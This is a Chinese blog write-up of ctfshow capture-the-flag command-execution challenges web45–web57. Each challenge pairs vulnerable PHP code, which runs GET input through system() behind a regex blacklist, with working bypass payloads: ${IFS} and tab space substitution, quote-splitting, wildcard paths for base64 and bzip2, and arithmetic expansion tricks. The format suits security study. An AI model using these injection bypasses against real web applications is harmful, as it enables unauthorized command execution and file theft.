【ctfshow】命令执行->web45-57

2023-04-28 15:16:27 浏览数 (4)

前言

争取今天写完

web45

代码语言:javascript复制
 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 

还是那个垃圾桶的问题,ban了空格。

对了,昨天有个事忘说了

  1. *可以代替0个及以上任意字符
  2. ?可以代表1个任意字符
代码语言:javascript复制
?c=tac	flag.php||

tac绕cat

flag绕flag

||截断

web46

代码语言:javascript复制
 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag| |[0-9]|\$|*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 

ban了

用单引号绕

代码语言:javascript复制
?c=tac<>fl''ag.php||
?c=nl<>fl''ag.php||

web47-51

46的Payload通杀

web52

代码语言:javascript复制
 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag| |[0-9]|*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|`|%|x09|x26|>|</i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

这题ban了<>,但把$放出来了

换个绕空格的方法就行

代码语言:javascript复制
?c=nl${IFS}fl''ag.php||

web53

代码语言:javascript复制
 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag| |[0-9]|*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|`|%|x09|x26|>|</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

换姿势了?(不是

仔细看看代码,还是往system()里传入命令

先ls试一下

直接读,nl还在,$也在

代码语言:javascript复制
?c=nl${IFS}flag.php

web54

又换姿势了?

代码语言:javascript复制
 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|`|%|x09|x26|>|</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
} 

不得不再提到一个命令

uniq

uniq命令是Linux中的一个文本处理命令,用于去除重复的行。 它可以从输入文件或标准输入中读取文本,并将重复的行过滤掉,只输出不重复的行。

由此,直接传

代码语言:javascript复制
?c=uniq${IFS}f???.php

web55

代码语言:javascript复制
 <?php
// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|[a-z]|`|%|x09|x26|>|</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

这个难点,无字母数字命令执行

bin目录: bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等这里我们可以利用 base64 中的64 进行通配符匹配 即 /bin/base64 flag.php 对应的就是/???/???64 ???.??? /usr/bin目录: 主要放置一些应用软件工具的必备执行档例如c 、g 、gcc、chdrv、diff、dig、du、eject、elm、free、gnome*、 zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、 newaliases、nslookup passwd、quota、smb*、wget等。 我们可以利用/usr/bin下的bzip2 ——引自https://blog.csdn.net/weixin_54515836/article/details/113305690

代码语言:javascript复制
?c=/???/????64 ????????/   //就是bin/base64 flag.php
?c=/???/???/???2 ????.???    //也就是/usr/bin/bzip2 flag.php

后者直接url /flag.php.bz2下载

web56

这是真不会

Orz

web57

代码语言:javascript复制
 <?php
// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|[a-z]|[0-9]|`||#|'|"|`|%|x09|x26|x0a|>|<|.|,|?|*|-|=|[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

换姿势了

  • ${_} 上次命令执行的结果
  • $(()) 进行运算
  • (("")) == 0

对((“”))=0,对((“”))取反即(( ((“”))))为-1,37个-1相减得到-37,再取反得到36

 得到

代码语言:javascript复制
?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

另一种姿势

代码语言:javascript复制
?c=grep${IFS}'fla'${IFS}fla??php

grep 指令用于查找内容包含指定的范本样式的文件,如果发现某文件的内容符合所指定的范本样式,预设 grep 指令会把含有范本样式的那一列显示出来。

 今天是写不完喽

1 人点赞